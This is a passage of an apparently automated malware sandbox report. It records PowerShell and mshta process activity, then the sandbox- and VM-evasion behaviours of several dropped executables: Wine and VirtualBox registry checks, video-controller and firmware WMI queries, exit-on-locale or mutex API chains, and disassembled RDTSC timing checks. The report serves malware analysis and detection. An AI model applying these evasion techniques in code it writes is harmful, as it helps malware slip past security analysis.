                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                      Malware Analysis System Evasion

                                      barindex
                                      Contains functionality to detect sleep reduction / modifications
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0040837017_2_00408370
                                      Found API chain indicative of sandbox detection
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_18-95831
                                      Found evasive API chain (may stop execution after checking computer name)
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeEvasive API call chain: GetComputerName,DecisionNodes,ExitProcessgraph_17-54642
                                      Found evasive API chain (may stop execution after checking locale)
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_17-53360
                                      Found evasive API chain (may stop execution after checking mutex)
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_17-53367
                                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                      Query firmware table information (likely to detect VMs)
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSystem information queried: FirmwareTableInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exeSystem information queried: FirmwareTableInformation
                                      Tries to detect sandboxes / dynamic malware analysis system (registry check)
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEFile opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Tries to detect virtualization through RDTSC time measurements
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 272E01 second address: 272E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F061A second address: 3F066A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c ja 00007FE310CDC396h 0x00000012 jmp 00007FE310CDC3A1h 0x00000017 jmp 00007FE310CDC3A7h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jne 00007FE310CDC396h 0x00000025 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F066A second address: 3F066E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F066E second address: 3F0676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F0676 second address: 3F067E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F07F6 second address: 3F0801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F0801 second address: 3F0807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F0807 second address: 3F0819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FE310CDC398h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F0E13 second address: 3F0E26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Eh 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F0F7C second address: 3F0F82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F44B4 second address: 3F44C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F44C0 second address: 3F44C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F44C5 second address: 3F44CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F44CB second address: 3F4501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D2F05h], ecx 0x00000012 push 00000000h 0x00000014 call 00007FE310CDC399h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007FE310CDC396h 0x00000022 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F4501 second address: 3F4505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F4505 second address: 3F4525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE310CDC3A8h 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F4525 second address: 3F4574 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE311181216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FE311181228h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jng 00007FE31118121Ah 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f jnl 00007FE311181229h 0x00000025 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F4574 second address: 3F45C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 ja 00007FE310CDC396h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FE310CDC39Ah 0x00000017 pop eax 0x00000018 or dword ptr [ebp+122D2D88h], esi 0x0000001e push 00000003h 0x00000020 stc 0x00000021 push 00000000h 0x00000023 mov dword ptr [ebp+122D361Ah], esi 0x00000029 push 00000003h 0x0000002b and esi, 38697D1Bh 0x00000031 add dword ptr [ebp+122D29E7h], ecx 0x00000037 push A506F156h 0x0000003c push eax 0x0000003d push edx 0x0000003e push ebx 0x0000003f jmp 00007FE310CDC39Eh 0x00000044 pop ebx 0x00000045 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F45C7 second address: 3F4604 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE311181218h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 6506F156h 0x00000013 mov dword ptr [ebp+122D3537h], ecx 0x00000019 lea ebx, dword ptr [ebp+12455208h] 0x0000001f mov dh, 69h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FE311181229h 0x00000029 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3F4604 second address: 3F460E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FE310CDC396h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 415FCA second address: 415FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 415FCE second address: 415FD3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 415FD3 second address: 416000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jo 00007FE311181216h 0x0000000c jp 00007FE311181216h 0x00000012 jmp 00007FE311181223h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 416000 second address: 416006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 3E5609 second address: 3E560D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 413E6E second address: 413E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 413E74 second address: 413E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 414137 second address: 414173 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE310CDC3A2h 0x00000008 jnp 00007FE310CDC396h 0x0000000e jo 00007FE310CDC396h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jno 00007FE310CDC39Ch 0x0000001e jnp 00007FE310CDC3A8h 0x00000024 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4142AD second address: 4142B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jl 00007FE311181216h 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 41440F second address: 41444F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE310CDC3A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FE310CDC3A3h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007FE310CDC396h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 41444F second address: 414453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 414453 second address: 414457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 41457F second address: 414589 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE311181216h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
